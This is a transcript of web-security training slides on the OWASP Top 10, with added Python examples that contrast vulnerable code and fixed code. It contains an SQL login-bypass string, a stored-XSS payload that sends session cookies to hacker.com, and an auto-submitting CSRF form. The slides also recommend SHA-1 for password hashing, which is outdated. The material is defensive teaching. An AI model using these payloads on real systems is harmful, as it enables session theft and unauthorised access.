Web app security - owasp top 10
    Presentation Transcript

    • Web Application Security: OWASP Top 10
      Digicomp Hacking Day 2012
      Compass Security AG, Werkstrasse 20, Postfach 2038, CH-8646 Jona
      Tel. +41 55-214 41 60, Fax +41 55-214 41 61, team@csnc.ch, www.csnc.ch
    • OWASP TOP 10
      © Compass Security AG, www.csnc.ch
    • OWASP Top 10 (RC1 2010)
      A1 SQL Injection
      A2 Cross Site Scripting
      A3 Broken Auth & Session Management
      A4 Insecure Direct Object Reference
      A5 Cross Site Request Forgery
      A6 Security Misconfiguration
      A7 Failure to Restrict URL Access
      A8 Unvalidated Redirects and Forwards
      A9 Insecure Cryptographic Storage
      A10 Insufficient Transport Layer Protection
    • SQL Injection
    • A1: SQL Injection
      Injection flaws occur when an application sends untrusted data to an interpreter. Injection flaws are very prevalent, often found in SQL queries, LDAP queries, XPath queries, OS commands, program arguments, etc. Injection flaws are easy to discover when examining code, but more difficult via testing.
    • Introduction (diagram: protocols HTTPS, RMI, SQL)
    • SQL Injection
      User input is directly used to build SQL statements. Diagram: the hacker injects a SQL string through the browser, the application assembles a malicious query, and the SQL query is modified via the browser:
        select creditcard from Customers where user is 'ibuetler' OR 1=1;
    • SQL Injection (diagram: protocols HTTPS + SQL, hacker code, RMI, SQL)
    • Threat: Bypass Authentication
      Assembling strings to SQL queries: dynamic concatenation of the SQL string and parameters.
        public boolean auth(String user, String pass) {
            boolean isAuthenticated = false;
            // vulnerable: user and pass are concatenated into the SQL text
            String sqlQueryString = "SELECT Username " +
                "FROM Users WHERE Username = '" + user + "'" +
                " AND Password = '" + pass + "'";
            int resultCount = perform(sqlQueryString);
            if (resultCount > 0) {
                return true;
            }
            return false;
        }
      The check only tests whether at least one record exists, but the result must contain 0 or one result.
    • Threat: Bypass Authentication
      Attacker uses the following input:
        Login: meier
        Password: ' OR '' = '
      Resulting query:
        SELECT Username FROM Users WHERE Username='meier' AND Password='' OR ''=''
      The WHERE clause evaluates to TRUE, all rows of the table get selected, the result set will not be empty!!! User gets authenticated!
    • Countermeasures A1: SQL Injection
    • Secure Programming
      Java: use Prepared Statements
      ADO.NET: use the Parameters Collection
      DB level: Stored Procedures (do not use dynamic SQL in SPs!)
    • Secure Programming (I) - Java
      Java Prepared Statements: the SQL statement gets precompiled at the database; parameters are separate from the SQL statement; much faster when the SQL statement is used several times; safe against SQL injection attacks.
        PreparedStatement updateSales = dbCon.prepareStatement("UPDATE COFFEES SET " +
            "SALES = ? WHERE COF_NAME LIKE ?");
        updateSales.setInt(1, 75);              // correct
        updateSales.setString(2, "Colombian");  // usage
        updateSales.executeUpdate();
    • Insecure - Secure Programming (III)
      But be aware: this Prepared Statement is still vulnerable to SQL injection!
        // Prepares the statement on the database
        PreparedStatement updateSales = dbCon.prepareStatement(
            "UPDATE COFFEES SET SALES = ? WHERE COF_NAME " +
            "LIKE '" + name + "'");                        // insecure usage: name is concatenated
        // Sets the parameters for the statement
        updateSales.setString(1, req.getParameter("sale"));
        // Executes the statement
        updateSales.executeUpdate();
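The three situations from the preceding slides (string concatenation, a fully parameterised query, and a prepared statement that still concatenates one value), rebuilt as an added example in Python on an in-memory SQLite table. This is not code from the slides; the Users table, accounts and passwords are constructed here.

```python
# Added example (not from the Compass Security slides): the auth() check rebuilt in
# Python on an in-memory SQLite database, once with string concatenation, once with
# bound parameters, and once "half parameterised" as on the 'Insecure - Secure
# Programming' slide. Table contents below are constructed for the demo.
import sqlite3


def setup_db() -> sqlite3.Connection:
    """Constructed sample table using the Users/Username/Password schema of the slides."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Users (Username TEXT, Password TEXT)")
    con.executemany("INSERT INTO Users VALUES (?, ?)",
                    [("meier", "s3cret"), ("ibuetler", "hunter2")])
    return con


def auth_concat(con: sqlite3.Connection, user: str, pwd: str) -> bool:
    """Vulnerable: the SQL text is assembled from user input (the auth() pattern)."""
    sql = ("SELECT Username FROM Users WHERE Username = '" + user +
           "' AND Password = '" + pwd + "'")
    return len(con.execute(sql).fetchall()) > 0


def auth_param(con: sqlite3.Connection, user: str, pwd: str) -> bool:
    """Fixed: both values travel as bound parameters, never as SQL text."""
    rows = con.execute(
        "SELECT Username FROM Users WHERE Username = ? AND Password = ?",
        (user, pwd)).fetchall()
    # A correct login matches exactly one row; 0 or more than 1 is a failure.
    return len(rows) == 1


def auth_half_param(con: sqlite3.Connection, user: str, pwd: str) -> bool:
    """Still vulnerable: the password is bound, but the username is concatenated."""
    sql = ("SELECT Username FROM Users WHERE Username = '" + user +
           "' AND Password = ?")
    return len(con.execute(sql, (pwd,)).fetchall()) > 0


def run_demo() -> dict:
    """Returns the outcome of a legitimate and a bypass attempt for each variant."""
    con = setup_db()
    bypass = "' OR '' = '"   # the input from the 'Bypass Authentication' slide
    return {
        "concat_legit": auth_concat(con, "meier", "s3cret"),
        "concat_bypass": auth_concat(con, "meier", bypass),
        "param_legit": auth_param(con, "meier", "s3cret"),
        "param_bypass": auth_param(con, "meier", bypass),
        "half_legit": auth_half_param(con, "meier", "s3cret"),
        # same input placed in the concatenated username field, wrong password
        "half_bypass": auth_half_param(con, "meier" + bypass, "wrong"),
    }


if __name__ == "__main__":
    for name, ok in run_demo().items():
        print("%-14s authenticated=%s" % (name, ok))
```

Only the fully parameterised variant refuses the bypass input; binding a single parameter does not help while any other value is still concatenated into the query text.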
    • A2: Cross Site Scripting
      XSS is the most prevalent web application security flaw. XSS flaws occur when an application includes user supplied data in a page sent to the browser without properly validating or escaping that content.
    • Attack Vector
      Protocol: JavaScript from www.abc.com is loaded to the client (malware).
      Attacking!! Authentication into the web application; session hijacking (re-use of the client session).
    • Java Script from Malware Site (1)
      Diagram: malware site, e-bank, cookie between e-bank and browser. JavaScript from the malware site IS GENERALLY DENIED access to the e-bank cookie because of the SAME ORIGIN POLICY.
    • Java Script from Malware Site (2)
      Diagram: malware site, e-bank, cookie between e-bank and browser, with <script src=http://Malware Site/m.js>. JavaScript from the malware site IS ALLOWED to access the e-bank cookie if the script is loaded from the e-bank site (origin) with <script src=>.
    • Cross-Site Scripting (XSS)
    • Session Stealing Sequence
      The malicious JavaScript performs its own request (participants: hacker, web client, application):
        Hacker → Application: POST /document.jsp?id=898&value=<script>location.href="http://hacker.com/"+document.cookie</script>
        Application: stores value in DB
        Client → Application: GET /app/document.jsp?id=898 (Cookie: session=123)
        Application → Client: response contains <script>location.href="http://hacker.com/"+document.cookie</script>
        Client → Hacker: GET /session=123
        Hacker: stores request in log file
    • Reflected XSS
      What is reflected XSS? Data provided by a web client is used immediately by server-side code to generate a page of results for that user. The attacker has to send a crafted link to the victim. Typical example: search form.
      Sequence (attacker, victim, webserver):
        Attacker → Victim: sends link http://example.com/search?<script>...</script>
        Victim → Webserver: GET /search?<script>...</script>
        Webserver → Victim: search results for: <script>...</script>
        Script is executed
    • Stored XSS
      What is stored XSS? Data provided by a web client is stored in a database. This data is then presented to the user unencoded. The malicious script is rendered more than once. XSS worms are based on stored XSS vulnerabilities. Typical example: message board.
    • Recommendations
    • XSS Prevention
      Possible solutions:
        Convert output into HTML entities: < becomes &lt;, > becomes &gt;, " becomes &quot;, ' becomes &apos;
        Input validation on characters: do not accept "dangerous" characters (e.g. <); delete "dangerous" characters from the request; transform "dangerous" characters into HTML entities
        Input validation on strings / tags: do not accept "dangerous" tags (e.g. <script>); delete "dangerous" tags from the request; transform "dangerous" tags into HTML entities
    • ESAPI
      OWASP Enterprise Security API (ESAPI), available for all major programming languages: Java, .NET (work in progress), PHP (work in progress), ColdFusion (work in progress), ...
      Methods to prevent XSS:
        Encoder.encodeForHTML(maliciousString);
        Encoder.encodeForHTMLAttribute(maliciousString);
        Encoder.encodeForJavascript(maliciousString);
        Encoder.encodeForVBScript(maliciousString);
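Output encoding per context, as an added Python example that mirrors the first three ESAPI method names from the slide; it is neither ESAPI's code nor code from the slides. `html.escape` covers the HTML body and attribute contexts, the JavaScript encoder is written here by hand, and the input is the stored payload from the session stealing slide.

```python
# Added example (not from the slides, not OWASP ESAPI): context-specific output
# encoders in plain Python. html.escape serves the HTML body and attribute contexts;
# the standard library has no JavaScript string encoder, so one is written here.
import html
import string

_JS_SAFE = set(string.ascii_letters + string.digits)


def encode_for_html(s: str) -> str:
    """For text between tags: < > & " ' become entities (html.escape emits &#x27;
    for the single quote instead of the &apos; shown on the slide)."""
    return html.escape(s, quote=True)


def encode_for_html_attribute(s: str) -> str:
    """For a value inside a double-quoted attribute; encoding the quote is essential."""
    return html.escape(s, quote=True)


def encode_for_javascript(s: str) -> str:
    """For data inside a JS string literal: every non-alphanumeric character becomes
    \\xHH or \\uHHHH, so neither quotes nor </script> can end the literal."""
    out = []
    for ch in s:
        if ch in _JS_SAFE:
            out.append(ch)
        elif ord(ch) < 256:
            out.append("\\x%02x" % ord(ch))
        else:
            out.append("\\u%04x" % ord(ch))
    return "".join(out)


def render_comment(user_text: str) -> str:
    """Message-board page from the 'Stored XSS' slide, with the stored comment placed
    in three contexts and encoded once for each: body text, attribute, JS variable."""
    return (
        '<div title="%s">%s</div>\n'
        '<script>var lastComment = "%s";</script>'
        % (encode_for_html_attribute(user_text),
           encode_for_html(user_text),
           encode_for_javascript(user_text))
    )


def looks_inert(page: str) -> bool:
    """Coarse check: the injected tag and an attribute break-out did not survive."""
    return "<script>location" not in page and '"><' not in page


# Constructed input: the payload from the 'Session Stealing Sequence' slide.
PAYLOAD = '<script>location.href="http://hacker.com/"+document.cookie</script>'

if __name__ == "__main__":
    print(render_comment(PAYLOAD))
```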
    • A3: Broken Authentication
      Developers frequently build custom authentication and session schemes, but building these correctly is hard. As a result, they frequently have flaws, usually in areas such as logout, password management, timeouts, remember me, secret question, account update, etc. Finding such flaws can sometimes be difficult, as each implementation is unique.
    • HTTP Authentication Mechanisms (diagram)
    • Strong Authentication (diagram): SMS; 1) UN/PW, 2) OTP
    • Client Certificate Auth (diagram)
    • Authentication Strength
      Factors of authentication (3 variants):
        To KNOW something: password, PIN
        To OWN something: smartcard, SecurID, Safeword, Vasco, OTP
        To BE something: fingerprint, iris, voice, face
      Definition of "strong authentication": combination of at least 2 factors
    • Authentication in Web Applications
      Browser authentication based on response headers (HTTP protocol): BasicAuth, DigestAuth, NTLM Auth
      Form-based authentication (application login): POST submits the login credentials in the POST body; GET submits the login credentials in the URL
      SSL based authentication (HTTPS protocol): client certificate
      Authentication schemes: direct, challenge/response, second channel (SMS, tokens)
    • Login Service Attacks
    • User Enumeration
      Verbose login related error messages can lead to user enumeration: "Password incorrect", "User unknown".
      Login error messages must be neutral: "Username or Password incorrect".
      Critical dialogs: login, change password, lost password.
    • Session Handling Attacks
    • Session Fixation
      Special form of session hijacking: the hacker tricks the victim into using a session known to the hacker. In the example, URL based session tracking is used.
      Sequence (victim, hacker, webapp):
        Hacker → WebApp: /index.html
        WebApp → Hacker: Session=123
        Hacker → Victim: "Please use session=123 for the Webapp"
        Victim → WebApp: /index.html; Session=123
        WebApp → Victim: LoginForm
        Victim → WebApp: doLogin(UserCredentials) + session=123
        WebApp: Authenticate(); Auth=Successful!
        Victim → WebApp: /protected/index.html + session=123
        Hacker → WebApp: /protected/index.html + session=123
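The sequence above replayed against a small in-memory session manager, as an added Python example that is not part of the slides. It shows the usual fix: issuing a fresh session id at login, so an id handed to the victim beforehand never becomes an authenticated session. The session store, credential check and id format are all constructed for the demo.

```python
# Added example (not from the slides): minimal session store with URL-style session
# ids. With regenerate_on_login=False the fixation sequence from the slide succeeds;
# with True the pre-login id is discarded at authentication. Everything here,
# including the "correct" password, is constructed for the demonstration.
import secrets
from typing import Optional


class SessionStore:
    def __init__(self, regenerate_on_login: bool):
        self.sessions = {}                    # session id -> {"user": None or name}
        self.regenerate_on_login = regenerate_on_login

    def index(self, sid: Optional[str] = None) -> str:
        """GET /index.html: accept a presented id (URL based tracking) or issue one."""
        if sid is None or sid not in self.sessions:
            sid = secrets.token_hex(8)
            self.sessions[sid] = {"user": None}
        return sid

    def do_login(self, sid: str, user: str, password: str) -> str:
        """doLogin(UserCredentials): on success returns the id the client must use."""
        if password != "correct":             # constructed credential check
            raise PermissionError("bad credentials")
        if self.regenerate_on_login:
            # Fix: drop the pre-login id and bind the authenticated state to a new one.
            self.sessions.pop(sid, None)
            sid = secrets.token_hex(8)
        self.sessions[sid] = {"user": user}
        return sid

    def protected(self, sid: str) -> bool:
        """/protected/index.html: only authenticated sessions get through."""
        return self.sessions.get(sid, {}).get("user") is not None


def fixation_attack(store: SessionStore) -> bool:
    """Replays the slide's sequence; returns True if the hacker's id ends up authenticated."""
    hacker_sid = store.index()                          # hacker obtains Session=123
    victim_sid = store.index(hacker_sid)                # victim is tricked into using it
    store.do_login(victim_sid, "victim", "correct")     # victim logs in with that id
    return store.protected(hacker_sid)                  # is the known id now logged in?


if __name__ == "__main__":
    print("without regeneration:", fixation_attack(SessionStore(False)))
    print("with regeneration:   ", fixation_attack(SessionStore(True)))
```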
    • A4: Insecure Direct Object References
      1. For direct references to restricted resources, the application needs to verify the user is authorized to access the exact resource they have requested.
      2. If the reference is an indirect reference, the mapping to the direct reference
    • Security by Obscurity
      Insecure admin links: menu links as the only means of authorization; bypass with URL and parameter guessing possible.
      Only partially implemented authorization: function authorization only.
    • Authorization "decentralized"
      Single functions must call authorization checks (diagram: request → function or data, each with its own authorization check).
      Threats: calls to the authorization module are easily forgotten; each function must be tested.
    • Authorization "centralized"
      Authorization must be implemented as centrally as possible, as one module (diagram: request → authorization check → function or data).
      Advantages: less risk that the implementation of authorization checks is forgotten; easier to test.
      Disadvantages: data authorization is often difficult to achieve.
    • A5: Cross Site Request Forgery
      The easiest way to check whether an application is vulnerable is to see if each link and form contains an unpredictable token for each user. Without such an unpredictable token, attackers can forge malicious requests. Focus on the links and forms that invoke state-changing functions, since those are the most important CSRF targets.
    • Introduction
      Cross Site Request Forgery has many names: XSRF, Session Riding, One Click Attack.
      XSRF != XSS: XSS exploits the trust that a client has for the website/application (the client trusts the website: all the JavaScript code is necessary to run the web application). XSRF exploits the trust that a website has for the user (the website trusts the client: all requests made by the user are intended to be made).
    • Cross Site Request Forgery
      Diagram: malware site, e-bank, cookie between e-bank and browser. JavaScript from the malware site IS NOT ALLOWED to access the e-bank cookie.
    • Cross Site Request Forgery
      Diagram: malware site, e-bank, cookie between e-bank and browser. <img src=http://bank/do_trade> loads an image from the bank; this is allowed, and it performs the malicious transaction.
    • XSRF with GET Method
      Actions can be made by calling GET requests (e.g. order some items):
        http://www.shop.com/controller?action=buy&productId=1&quantity=23
    • XSRF with POST Method
      Actions can be made by calling POST requests (e.g. order some items):
        POST /controller
        Host: www.shop.com
        .....
        action=buy&productId=1&quantity=23
    • Malicious Hacker "POST" Form
      Prepared website from the hacker:
        <body>
          <form action="http://www.shop.com/controller" method="POST">
            <input type="hidden" name="action" value="buy"/>
            <input type="hidden" name="productId" value="1"/>
            <input type="hidden" name="quantity" value="23"/>
          </form>
          <script>
            document.forms[0].submit();
          </script>
        </body>
    • Assumptions
      The attacker knows the target website: what do the requests look like?
      The victim has a valid session cookie. If session handling is done in the URL, the website is not vulnerable to this kind of attack.
    • Remediation
      The form contains a hidden field with a random token. Executing the request will send the hidden-field token to the server. The server now checks if the hidden-field token is valid; if not, the request is cancelled.
      Only allowing POST requests is no solution (hidden form, JavaScript: form.submit()).
      In other words: websites should embed a fresh nonce in every form and check for it on every request. Forged requests will have the cookie, but not the nonce.
    • Order after Remediation
      Sequence (victim, webshop):
        Victim → Webshop: Login
        Webshop → Victim: Cookie = 123
        Victim → Webshop: GET /order_form.htm (Cookie=123)
        Webshop: generate random token and embed it in the form as a hidden field
        Webshop → Victim: order_form.htm containing <input type="hidden" name="token" value="uiwe4qi4">
        Victim → Webshop: GET /controller?action=buy&token=uiwe4qi4&... (Cookie=123)
        Webshop: check token
        Webshop → Victim: Order successful
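The remediation and the order sequence above as a small in-memory web shop, an added Python example rather than code from the slides. The session cookie values, the token format and the request dictionaries are constructed here; a real application would read them from the cookie header and the form body.

```python
# Added example (not from the slides): per-session CSRF token embedded as a hidden
# field and checked on every state-changing request. Sessions, tokens and request
# parameters are constructed in memory for the demonstration.
import hmac
import secrets


class WebShop:
    def __init__(self):
        self.sessions = {}      # session cookie -> {"user": ..., "token": ...}
        self.orders = []

    def login(self, user: str) -> str:
        """Returns the session cookie value (the 'Cookie = 123' step)."""
        sid = secrets.token_urlsafe(16)
        # One fresh random token per session, embedded in every form later on.
        self.sessions[sid] = {"user": user, "token": secrets.token_urlsafe(16)}
        return sid

    def order_form(self, cookie: str) -> str:
        """GET /order_form.htm: embeds the token as a hidden field."""
        sess = self.sessions[cookie]
        return ('<form action="/controller" method="POST">'
                '<input type="hidden" name="action" value="buy"/>'
                '<input type="hidden" name="token" value="%s"/>'
                '</form>' % sess["token"])

    def controller(self, cookie: str, params: dict) -> str:
        """/controller: the cookie alone is not enough, the token must match too."""
        sess = self.sessions.get(cookie)
        if sess is None:
            return "401 not logged in"
        supplied = params.get("token", "")
        # Constant-time comparison so the check itself leaks nothing about the token.
        if not hmac.compare_digest(supplied, sess["token"]):
            return "403 CSRF token missing or invalid"
        if params.get("action") == "buy":
            self.orders.append((sess["user"], params.get("productId"),
                                params.get("quantity")))
            return "200 order successful"
        return "400 unknown action"


def extract_token(form_html: str) -> str:
    """Stands in for the browser, which submits hidden fields exactly as served."""
    marker = 'name="token" value="'
    start = form_html.index(marker) + len(marker)
    return form_html[start:form_html.index('"', start)]


def run_demo():
    """Returns (legitimate response, forged response, number of stored orders)."""
    shop = WebShop()
    cookie = shop.login("victim")
    # Legitimate flow: the victim loads the form and the browser submits its token.
    token = extract_token(shop.order_form(cookie))
    legit = shop.controller(cookie, {"action": "buy", "productId": "1",
                                     "quantity": "23", "token": token})
    # Forged flow (the hidden POST form of the 'Malicious Hacker "POST" Form' slide):
    # the browser attaches the victim's cookie, but the page cannot know the token.
    forged = shop.controller(cookie, {"action": "buy", "productId": "1",
                                      "quantity": "23"})
    return legit, forged, len(shop.orders)


if __name__ == "__main__":
    print(run_demo())
```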
    • Order after Remediation (diagram)
    • A6: Security Misconfiguration
      Security misconfiguration can happen at any level of an application stack, including the platform, web server, application server, framework, and custom code. Developers and network administrators need to work together to ensure that the entire stack is configured properly. Automated scanners are useful for detecting missing patches, misconfigurations, use of default accounts, unnecessary services, etc.
    • Examples of Misconfigurations
      Do you have a process for keeping current on the latest versions and patches to all the software in your environment? This includes the OS, web/app server, DBMS, applications, and any libraries.
      Is everything unnecessary disabled, removed, or not installed (e.g., ports, services, pages, accounts)?
      Are default account passwords changed or disabled?
      Are all other security settings configured properly?
      Are all servers protected by firewalls / filters ... etc.
      A concerted, repeatable process is required to develop and maintain a proper security configuration.
    • Examples of Misconfigurations
      Examples of Glocken-Shop misconfigurations:
        XML Injection -> /etc/passwd & /etc/shadow
        Directory browsing of glocken.hacking-lab.com/logs/
        Tomcat service runs with "root" privileges
    • A7: Failure to Restrict URL Access
      Applications are not always protecting page requests properly. Sometimes, URL protection is managed via configuration, and the system is misconfigured. Sometimes, developers must include the proper code checks, and they forget. Detecting such flaws is easy. The hardest part is identifying which pages (URLs) exist to attack.
    • Introduction
      Failure to restrict URL access: privilege escalation from anonymous to registered user; privilege escalation from registered to admin user.
      Examples of URLs:
        http://example.com/app/getappInfo
        http://example.com/app/admin_getappInfo
      Exploit: if an authenticated, non-admin user is allowed to access the "admin_getappInfo" page, this is a flaw, and may lead the attacker to more improperly protected admin pages.
    • Unvalidated Redirects and Forwards
      Such redirects may attempt to install malware or trick victims into disclosing passwords or other sensitive information. Unsafe forwards may allow access control bypass.
    • Insecure Cryptographic Storage
      The most common flaw in this area is simply not encrypting data that deserves encryption. When encryption is employed, unsafe key generation and storage, not rotating keys, and weak algorithm usage are common. Use of weak and unsalted hashes to protect passwords is also common. External attackers have difficulty detecting such flaws due to limited access.
    • Hashed and Salted User Passwords
      Do not store passwords in plain text in the table!! Example: a table with user accounts & plaintext passwords poses a high security risk!
        mysql> select username, password from users;
        +----------+----------+
        | username | password |
        +----------+----------+
        | hacker10 | compass  |
        | hacker11 | compass  |
        ...
      If possible: one-way hashed and salted passwords using hash algorithms like SHA-1 (do not use MD5 anymore).
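Storing a per-user random salt and a one-way hash instead of the plaintext column above, as an added Python example that is not from the slides. It deliberately uses PBKDF2-HMAC-SHA256 with a high iteration count in place of the single SHA-1 pass the slide mentions, and the user table is constructed in memory rather than in MySQL.

```python
# Added example (not from the slides): salted, iterated password hashing for the
# users table shown on the slide. PBKDF2-HMAC-SHA256 is used here instead of a
# plain SHA-1 digest; the accounts and the iteration count are constructed values.
import hashlib
import hmac
import os
from typing import Optional

ITERATIONS = 200_000


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Returns 'pbkdf2_sha256$<iterations>$<salt hex>$<hash hex>' for storage."""
    salt = salt or os.urandom(16)            # fresh random salt for every user
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (ITERATIONS, salt.hex(), digest.hex())


def verify_password(password: str, stored: str) -> bool:
    """Recomputes the hash with the stored salt and compares in constant time."""
    algo, iterations, salt_hex, hash_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), hash_hex)


# Constructed users table: the two accounts from the slide, both with password 'compass'.
USERS = {name: hash_password("compass") for name in ("hacker10", "hacker11")}


def same_password_same_hash() -> bool:
    """With per-user salts, identical passwords no longer produce identical rows."""
    return USERS["hacker10"] == USERS["hacker11"]


if __name__ == "__main__":
    for name, row in USERS.items():
        print(name, row)
    print("identical rows:", same_password_same_hash())
```

Because the two stored rows differ even though the passwords are equal, a leaked table no longer reveals which users share a password, and each hash has to be attacked separately.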
    • Insufficient Transport Layer Protection
      Applications frequently do not properly protect network traffic. Usually, they use SSL/TLS during authentication, but not elsewhere, exposing all transmitted data as well as session IDs to interception. Applications sometimes use expired or improperly configured certificates as well. Detecting such flaws is easy: just observe the site's network traffic.
    • Mitigation
      Use SSL + TLS: Set-Cookie: A=B; secure; HttpOnly
      Reverse proxy (diagram: entry server, reverse proxy, secure gateway)